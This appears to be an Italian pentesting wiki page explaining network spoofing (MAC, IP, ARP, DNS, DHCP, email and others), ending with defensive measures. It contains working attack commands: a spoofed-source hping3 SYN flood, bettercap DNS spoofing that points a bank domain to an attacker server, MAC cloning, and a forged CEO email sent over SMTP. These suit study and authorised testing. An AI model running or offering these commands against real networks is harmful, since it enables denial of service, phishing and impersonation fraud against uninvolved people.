Spoofing (falsificazione d'identità)
Spoofing = fingersi qualcun altro/qualcos'altro sulla rete. Qui i tipi principali: MAC, IP, ARP, DNS, DHCP, email e altri — come funzionano e come si fanno.
Concetto: perché lo spoofing funziona
Molti protocolli di rete sono nati senza autenticazione: chi riceve un pacchetto si fida del mittente dichiarato. Lo spoofing sfrutta esattamente questa fiducia, falsificando un identificatore a un certo livello:
| Livello | Identificatore falsificato | Attacco |
|---|---|---|
| 2 · Data Link | Indirizzo MAC | MAC spoofing, ARP spoofing |
| 3 · Rete | Indirizzo IP sorgente | IP spoofing |
| Servizi | Risposte DNS / lease DHCP | DNS/DHCP spoofing |
| Applicazione | Mittente email, Caller ID, GPS… | Email spoofing, ecc. |
MAC spoofing
Come funziona: il MAC è l'ID "fisico" della scheda di rete, ma è modificabile via software. Cambiarlo serve a: aggirare filtri MAC (WiFi/switch), impersonare un dispositivo autorizzato, o restare anonimi.
# 1) spegni l'interfaccia
sudo ip link set eth0 down
# 2a) MAC casuale con macchanger
sudo macchanger -r eth0
# 2b) MAC specifico (es. clonare un device autorizzato)
sudo macchanger -m 00:11:22:33:44:55 eth0
# 3) riaccendi
sudo ip link set eth0 up
# verifica
macchanger -s eth0
IP spoofing
Come funziona: falsifichi l'IP sorgente nei pacchetti che mandi. Il bersaglio pensa che arrivino da un altro host. Usi tipici: attacchi DoS (nascondere l'origine, riflessione/amplificazione), aggirare filtri basati su IP "fidati", e SYN flooding.
Limite chiave: le risposte tornano all'IP falsificato, non a te. Quindi l'IP spoofing "puro" funziona per attacchi "a senso unico" (flood) o quando sei già in mezzo (vedi MITM) per vedere le risposte. Non basta da solo per una connessione TCP completa (serve indovinare/vedere i sequence number).
# hping3: inviare pacchetti con IP sorgente falso (-a = spoof address)
# SYN flood verso la porta 80 spacciandosi per 1.2.3.4
sudo hping3 -S -a 1.2.3.4 -p 80 --flood BERSAGLIO
# scapy: costruire un pacchetto con IP sorgente arbitrario
sudo scapy
send(IP(src="1.2.3.4", dst="10.0.0.5")/ICMP())
ARP spoofing
È la forma di spoofing più usata per il MITM in LAN: dici alla vittima "il router sono io". Meccanismo e comandi completi (bettercap/ettercap) sono nella pagina dedicata:
WIKI→ MITM & SniffingCome funziona l'ARP, IP forwarding, bettercap/ettercap passo-passo, analisi Wireshark.DNS spoofing
Come funziona: rispondi al posto del server DNS con un IP falso, così banca.com punta al tuo server (phishing). Richiede di intercettare le query (di solito prima fai ARP spoofing).
# con bettercap, dopo aver attivato arp.spoof:
set dns.spoof.domains banca.com,*.banca.com
set dns.spoof.address 192.168.1.66 # il TUO server
dns.spoof on
Varianti avanzate: DNS cache poisoning (avvelenare la cache di un resolver, es. tecnica Kaminsky) e NXDOMAIN/hijack a livello di resolver.
DHCP spoofing / rogue DHCP
Come funziona: metti un server DHCP finto in LAN che risponde più in fretta di quello vero. Assegni alle vittime un gateway (te stesso) e un DNS (tuo) → diventi il loro man-in-the-middle "legittimo", senza nemmeno fare ARP spoofing.
# Ettercap ha il plugin dhcp; oppure si usa un dnsmasq configurato ad hoc.
# attacco correlato: DHCP starvation (esaurire il pool di IP)
yersinia -G # GUI per attacchi DHCP/STP/CDP
Email spoofing
Come funziona: SMTP permette di dichiarare un mittente qualsiasi nell'header From:. Se il dominio bersaglio non ha SPF/DKIM/DMARC configurati, l'email falsa arriva "da" chi vuoi (base del phishing/BEC).
# test manuale via telnet su un server SMTP aperto (lab)
telnet mail.lab.local 25
HELO test.com
MAIL FROM:<ceo@azienda.com>
RCPT TO:<vittima@azienda.com>
DATA
From: CEO <ceo@azienda.com>
Subject: Urgente
...
.
# verificare se un dominio è spoofabile: controlla i record
dig TXT azienda.com | grep -i spf
dig TXT _dmarc.azienda.com
Tool: swaks (Swiss Army Knife SMTP) per inviare mail di test; framework di phishing come GoPhish (vedi Arsenale · Social).
Altri tipi di spoofing
| Tipo | Cosa falsifica / come |
|---|---|
| Session hijacking / cookie spoofing | Rubi/indovini un token di sessione e ti spacci per la vittima (vedi XSS). |
| Referer / User-Agent spoofing | Falsifichi header HTTP per bypassare controlli lato server. |
| Caller ID spoofing | Numero chiamante falso nel vishing (VoIP/SIP). |
| SMS sender spoofing | Mittente alfanumerico falso negli SMS (smishing). |
| GPS spoofing | Trasmetti segnali GPS falsi (SDR) per ingannare la geolocalizzazione. |
| Website / clone spoofing | Copia pixel-perfect di un sito per phishing (es. con httrack o SET). |
| Biometric / face spoofing | Foto/maschere per ingannare riconoscimento facciale o impronte. |
Difesa
- MAC/ARP: Dynamic ARP Inspection, DHCP snooping, port security sugli switch.
- IP: egress/ingress filtering (BCP38), reverse path filtering.
- DHCP: DHCP snooping (solo server autorizzati rispondono).
- DNS: DNSSEC, resolver fidati, DoH/DoT.
- Email: configurare SPF + DKIM + DMARC (blocca il 99% dello spoofing di dominio).